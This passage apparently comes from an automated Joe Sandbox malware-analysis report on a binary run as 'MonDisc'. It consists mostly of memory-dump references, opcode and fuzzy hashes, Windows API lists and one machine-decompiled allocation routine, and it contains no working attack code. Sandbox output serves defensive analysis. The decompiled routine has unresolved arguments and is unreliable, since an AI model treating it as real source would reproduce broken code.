                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction ID: dc269e71354444110279dc8fec1c8eecf7636a4595e3780099b6099d5ea103cf
                              • Opcode Fuzzy Hash: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction Fuzzy Hash: 6F825C62E289074AFF545F34AD6A2B92AD57F25370FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction ID: f75f8f7684c0fed5b36c5ded3087eaf59489034908deb20d6df8e625951692ff
                              • Opcode Fuzzy Hash: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction Fuzzy Hash: C8825C62D289074AFF555F34AC6A2B92AD47F253B4FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: MessageTime
                              • String ID:
                              • API String ID: 761539514-0
                              • Opcode ID: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction ID: a2896c53d6ac9807c43ec495a312f5eb81710c50be4b1ad746ef493664e697a5
                              • Opcode Fuzzy Hash: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction Fuzzy Hash: 42725E62D2C9074AFF555B34AC6A2B92AD57F25370FA4463AD80ED3297DF3CB1498203
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
1715->1713 1716 7ff62c8fa017-7ff62c8fa069 call 7ff62c984484 call 7ff62c8fdc20 call 7ff62c8fe2b0 1715->1716 1724 7ff62c8fa06e 1716->1724 1725 7ff62c8fa070-7ff62c8fa07e 1724->1725 1725->1725 1726 7ff62c8fa080-7ff62c8fa091 1725->1726 1726->1724 1727 7ff62c8fa093-7ff62c8fa172 call 7ff62c984484 * 4 1726->1727 1743 7ff62c8fa174-7ff62c8fa182 1727->1743 1743->1743 1744 7ff62c8fa184 1743->1744 1745 7ff62c8fa186-7ff62c8fa19a 1744->1745 1745->1745 1746 7ff62c8fa19c-7ff62c8fa1cb call 7ff62c984484 GetCommandLineW 1745->1746 1751 7ff62c8fa1d0-7ff62c8fa1de 1746->1751 1751->1751 1752 7ff62c8fa1e0-7ff62c8fa33a call 7ff62c984484 GetCurrentProcessId GetLargePageMinimum GetMessageExtraInfo call 7ff62c984484 * 2 GetWindowTextLengthW call 7ff62c984484 * 2 1751->1752 1752->1500
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$ExtraInfoLengthMessageText$DefaultForegroundIconicLangLargeMinimumPageParentPopupUser
                              • String ID:
                              • API String ID: 2764942508-0
                              • Opcode ID: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction ID: bd92dc210b8b7842c86711e3d694decafa4df4de14a90d28e3987d5445ac83f2
                              • Opcode Fuzzy Hash: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction Fuzzy Hash: 0C623E62D2C9164AFF516B34AC652B92AD57F253B0F94863AD80DD22A7EF3CB085C503
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction ID: bddc54d9a925b88dfb70d14a41d7d9557462e42e08ee6024d555c6ac19cfea86
                              • Opcode Fuzzy Hash: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction Fuzzy Hash: 32427162D1C9474EFF516B34AC262B92AD57F267B0FA4463AD80DD7293EF2CB0458213
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Similarity
                              • API ID: Window$Popup$CommandCountExtraInfoLineMessageShellTick$CurrentForegroundHandleLengthModuleProcessTextZoomed$ActiveIconicLast
                              • String ID: arg
                              • API String ID: 2041650259-2022414218
                              • Opcode ID: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction ID: 576b1569fccb6fc0b2d11123588c656783922bfd67bbe2e8611d73cf5387dc0f
                              • Opcode Fuzzy Hash: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction Fuzzy Hash: 6432C362E289174AFF146B34AC291B92AD47F257B1F94463AD90EC22D7EF3CF1458243
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: Parent
                              • String ID:
                              • API String ID: 975332729-0
                              • Opcode ID: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction ID: 32ad1f17b85f2d0905f1b810eb765aa32ea88ef0f19ffe0af850b0224aa11550
                              • Opcode Fuzzy Hash: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction Fuzzy Hash: C3625CA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: CurrentProcess
                              • String ID:
                              • API String ID: 2050909247-0
                              • Opcode ID: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction ID: eab47c52af4be9f17a0de86fde66c6969f9aad7bfd076be5387e33f66c717e40
                              • Opcode Fuzzy Hash: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction Fuzzy Hash: 3A625FA2D289174EFF456F34AC662B929D47F263B4FA4463AD819D32D7EF2CB0458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction ID: 6dcbdcdff8d4f216c09dac04d7a1f590a311eb00f3ec093ac9ad22f8fd447030
                              • Opcode Fuzzy Hash: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction Fuzzy Hash: 50624D97E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction ID: cb856b98549ed4dd4c1da389ce0344cee3cd597b9ef042c0815b9eb7b865d8c1
                              • Opcode Fuzzy Hash: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction Fuzzy Hash: 38625DA3E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: Popup$Window$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 1249249616-0
                              • Opcode ID: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction ID: 7bef7cea88e5bd89c8e1d25cfa540e282b1e8d2b0ae9156683c7e7ba320bd845
                              • Opcode Fuzzy Hash: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction Fuzzy Hash: 59625EA3E289034AFF446F34AC662B969D57F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Similarity
                              • API ID: PopupWindow$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 4133814404-0
                              • Opcode ID: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction ID: 8b68264210559b207cab4b9bb32b1c7e8740c8e11b58d146dd131adef6c26471
                              • Opcode Fuzzy Hash: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction Fuzzy Hash: D2625DA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction ID: c3dd9cdd65f58efd872d6328274130541b24cd4587b1b7cca7c9878c0e166398
                              • Opcode Fuzzy Hash: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction Fuzzy Hash: 17325292D1CA178EFF516B309C262B926957F273B0FA48636D84DD7297EF2CB0858113
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ClickDoubleTime$DefaultDesktopLangSystemWindow
                              • String ID:
                              • API String ID: 146177575-0
                              • Opcode ID: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction ID: a29f918c35169a58e0984b62eca24ba4dc25f963b370f662b738bcafeeb3db39
                              • Opcode Fuzzy Hash: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction Fuzzy Hash: 2EC162A2D2C9438AFF006B34AD1A2B926E47F257B4F544B39D40AD26A7DF3CF1458613
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000003.488748301.00007FF605B86000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF605B86000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_3_7ff605b86000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID: $!$3$?$@'z$h^z$h^z
                              • API String ID: 0-1850887679
                              • Opcode ID: 22cd7ff66e859ccd906eead52ddb1aa94e97611fde4b83fe9c1f16c1b88ab1d2
                              • Instruction ID: e5d911f852e89b706b4a640965de96ff72ceca900b61781091f2c27233062af7
                              • Opcode Fuzzy Hash: 22cd7ff66e859ccd906eead52ddb1aa94e97611fde4b83fe9c1f16c1b88ab1d2
                              • Instruction Fuzzy Hash: 8643F931C14B0F8AD7569F288448670B3A0FF1A710F699774C89EAA4C5EF7479DAC782
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000016.00000003.488748301.00007FF605B86000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF605B86000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_3_7ff605b86000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 728f8aefec96af9c86c341f1da52758fc970afc4113fa47fc3de2dba9be93183
                              • Instruction ID: 80a08a29867e407f8bdc39266dc65155de18171b55bfb885f8d1dcb65acdeea2
                              • Opcode Fuzzy Hash: 728f8aefec96af9c86c341f1da52758fc970afc4113fa47fc3de2dba9be93183
                              • Instruction Fuzzy Hash: 35921B31C18A1F4ADB56AA288888675B390FF19700F6557B5DC8EEB086DF747C86C6C2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: DefaultExtraInfoLangMessageUser
                              • String ID: <
                              • API String ID: 3021954254-4251816714
                              • Opcode ID: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction ID: 087b3a54ed1d34837da6572d19a92faa152105025a53e25295fae01fa3735caf
                              • Opcode Fuzzy Hash: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction Fuzzy Hash: 7461AF57D685038AEF515F389C9A2FA59D43F293B4F948639D849C21A7EE3CF1898103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureExceptionRaiseRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 2358177407-0
                              • Opcode ID: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction ID: 02850991cc3d5dc36d953c0e9c5773ddb23191c0d570766eab3e868c25b50f8c
                              • Opcode Fuzzy Hash: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction Fuzzy Hash: 83314932A08B8182EF608F15F8443EAB361FB88790F485436DA8D43669EF3DE549CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExtraHandleInfoLargeMessageMinimumModulePagePopup
                              • String ID: <
                              • API String ID: 2008092851-4251816714
                              • Opcode ID: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction ID: 8d23a95a2b9b932e6a4cc62c2c0218142066baec86900b377243b1e269e8e6cf
                              • Opcode Fuzzy Hash: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction Fuzzy Hash: C251BF57D689034AFF555B349CAA2FA59C43F293B4F948A39D949C22A3DE3CF1894103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              C-Code - Quality: 52%
                              			E00007FF67FF62C914230(void* __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
                              				long _t51;
                              				signed int _t52;
                              				void* _t54;
                              				void* _t61;
                              				void* _t76;
                              				void* _t88;
                              				intOrPtr* _t89;
                              				signed long long _t93;
                              				long long _t95;
                              				long long* _t96;
                              				void* _t99;
                              				intOrPtr* _t105;
                              				intOrPtr _t106;
                              				long long _t108;
                              				intOrPtr _t111;
                              				void* _t116;
                              				signed long long _t119;
                              				signed long long _t121;
                              				signed long long _t122;
                              				long long _t130;
                              				void* _t134;
                              				intOrPtr _t137;
                              				intOrPtr _t140;
                              				intOrPtr _t142;
                              				long _t143;
                              				long _t147;
                              				signed long long _t148;
                              				void* _t150;
                              				signed long long _t152;
                              				void* _t153;
                              				signed long long _t155;
                              
                              				 *((long long*)(_t134 + 8)) = __rbx;
                              				 *((long long*)(_t134 + 0x10)) = _t130;
                              				 *((long long*)(_t134 + 0x18)) = __rsi;
                              				 *((long long*)(_t134 + 0x20)) = __rdi;
                              				r14d = 0;
                              				if (__rdx - 0x20000 < 0) goto 0x2c9142fd;
                              				_t152 = __rdx + 0x00020036 & 0xfffe0000;
                              				if (_t152 - __rdx <= 0) goto 0x2c9142fd;
                              				GetLastError();
                              				r9d = 4;
                              				r8d = 0x103000;
                              				VirtualAlloc(_t150, _t147);
                              				SetLastError(_t143);
                              				_t103 =  !=  ? __rax : 0xffffffff;
                              				if (0xffffffff == 0xffffffff) goto 0x2c9142fd;
                              				if (0xffffffff != 0xffffffff) goto 0x2c9142c3;
                              				goto 0x2c9142c9;
                              				_t104 = ( !=  ? __rax : 0xffffffff) + 0xffffffff;
                              				_t153 = _t152 - 0xffffffff;
                              				 *0xffffffff = 0xbadbad;
                              				 *0x00000007 = _t153 - 0x00000020 | 0x00000002;
                              				_t9 = _t104 + 0x10; // 0x10000000f
                              				_t88 = _t9;
                              				 *((long long*)(0xffffffff + _t153 - 0x18)) = 0xb;
                              				 *(( !=  ? __rax : 0xffffffff) + 0xffffffff + _t153 - 0x10) = _t147;
                              				if (_t88 != 0) goto 0x2c91445d;
                              				_t155 = __rdx + 0x00020040 & 0xfffe0000;
                              				if (_t155 - __rdx <= 0) goto 0x2c91445b;
                              				_t51 = GetLastError();
                              				r9d = 4;
                              				r8d = 0x3000;
                              				_t52 = VirtualAlloc(??, ??, ??, ??); // executed
                              				_t99 = _t88;
                              				SetLastError(??);
                              				_t145 =  !=  ? _t99 : 0xffffffff;
                              				if (0xffffffff == 0xffffffff) goto 0x2c91445b;
                              				_t89 = __rcx + 0x348;
                              				_t105 = _t89;
                              				if (_t89 == 0) goto 0x2c914404;
                              				asm("o16 nop [eax+eax]");
                              				_t140 =  *((intOrPtr*)(_t105 + 8));
                              				_t137 =  *_t105;
                              				_t116 = _t137 + _t140;
                              				if (0xffffffff == _t116) goto 0x2c91438b;
                              				_t106 =  *((intOrPtr*)(_t105 + 0x10));
                              				if (_t106 != 0) goto 0x2c914370;
                              				goto 0x2c9143ef;
                              				_t142 =  *((intOrPtr*)(__rcx + 0x20));
                              				if (_t142 - _t137 < 0) goto 0x2c9143ea;
                              				_t76 = _t142 - _t116;
                              				if (_t76 >= 0) goto 0x2c9143ea;
                              				 *((long long*)(_t106 + 8)) = _t140 + _t155;
                              				if (_t76 == 0) goto 0x2c9143be;
                              				r14d = _t52 & 0x00000007;
                              				_t148 =  ~_t147;
                              				r14d = r14d & 0x00000007;
                              				_t119 =  *(__rcx + 0x10) + _t155 - _t148;
                              				_t108 =  *((intOrPtr*)(__rcx + 0x20)) + _t148;
                              				 *((long long*)(__rcx + 0x20)) = _t108;
                              				 *(__rcx + 0x10) = _t119;
                              				_t93 = _t119 | 0x00000001;
                              				 *(_t108 + 8) = _t93;
                              				 *((long long*)(_t108 + _t119 + 8)) = 0x40;
                              				 *((long long*)(__rcx + 0x28)) = 0x200000;
                              				goto 0x2c914412;
                              				if (_t93 == 0) goto 0x2c914404;
                              				if ( *_t93 == 0xffffffff + _t155) goto 0x2c914444;
                              				if ( *((intOrPtr*)(_t93 + 0x10)) != 0) goto 0x2c9143f3;
                              				_t54 = E00007FF67FF62C913F80(_t52 & 0x00000007, _t51, _t61, _t99, __rcx, 0xffffffff, __rdi, __rcx, __rdx, _t155);
                              				_t121 =  *(__rcx + 0x10);
                              				if (__rdx - _t121 >= 0) goto 0x2c91445b;
                              				_t111 =  *((intOrPtr*)(__rcx + 0x20));
                              				_t122 = _t121 - __rdx;
                              				 *(__rcx + 0x10) = _t122;
                              				_t95 = _t111 + __rdx;
                              				 *((long long*)(__rcx + 0x20)) = _t95;
                              				 *(_t95 + 8) = _t122 | 0x00000001;
                              				_t96 = _t111 + 0x10;
                              				 *(_t111 + 8) = __rdx | 0x00000003;
                              				goto 0x2c91445d;
                              				 *((intOrPtr*)(_t96 + 8)) =  *((intOrPtr*)(_t96 + 8)) + _t155;
                              				 *_t96 =  !=  ? _t99 : 0xffffffff;
                              				E00007FF67FF62C915690(_t54, __rdx - _t121, __rcx, 0xffffffff, _t155, __rdx | 0x00000003);
                              				goto 0x2c91445d;
                              				return 0;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction ID: 11ca606a2b89079650a6a545d82144bd12ba7e94f9946d88472e9e1ee43a09ca
                              • Opcode Fuzzy Hash: 1f8f53a2a8f1067a6d9ce8600932e85ee154f6131d0fcfe8c50b931226d781b0
                              • Instruction Fuzzy Hash: AB51B372B09B8182EE24CB19E84537972A8FB49BA4F584A35CA6E877D1DF7CD442C301
